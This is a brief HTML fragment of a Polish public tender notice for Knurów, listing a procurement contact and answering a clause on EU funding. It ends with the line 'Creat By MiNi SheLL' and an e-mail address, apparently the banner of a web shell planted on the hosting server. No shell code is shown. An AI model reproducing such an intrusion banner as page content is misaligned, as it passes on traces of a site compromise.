2.Podinspektor Wydziału Zamówień Publicznych - Agnieszka Szulc, tel/fax 32 339 22 92, fax 32 441-97-44, e-mail: zp@knurow.pl..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com